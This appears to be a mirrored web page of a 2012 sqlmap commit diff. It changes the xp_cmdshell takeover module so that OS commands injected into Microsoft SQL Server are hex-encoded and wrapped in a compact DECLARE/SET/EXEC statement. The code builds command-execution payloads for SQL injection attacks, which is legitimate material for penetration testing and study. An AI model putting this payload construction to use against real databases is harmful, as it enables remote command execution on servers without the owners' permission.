sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-02-16 19:40:37 +03:00
Code Issues Packages Projects Releases Wiki Activity

hexencoding the command is much shorter than unescaping with CHAR() for MSSQL, also no need for spaces between nested comments when forging the xp_cmdshell command to run

Browse Source
This commit is contained in:
Bernardo Damele 2012-07-01 23:41:10 +01:00
parent ff9e97a42c
commit 18be319d13
1 changed files with 4 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
lib/takeover/xp_cmdshell.py
View File

@ -14,6 +14,7 @@ from lib.core.common import popValue
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.common import wasLastRequestDelayed
from lib.core.convert import hexencode
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
@ -148,9 +149,9 @@ class xp_cmdshell:
def xpCmdshellForgeCmd(self, cmd):
self.__randStr = randomStr(lowercase=True)
self.__cmd = unescaper.unescape("'%s'" % cmd)
self.__forgedCmd = "DECLARE @%s VARCHAR(8000); " % self.__randStr
self.__forgedCmd += "SET @%s = %s; " % (self.__randStr, self.__cmd)
self.__cmd = "0x%s" % hexencode(cmd)
self.__forgedCmd = "DECLARE @%s VARCHAR(8000);" % self.__randStr
self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd)
self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)
return self.__forgedCmd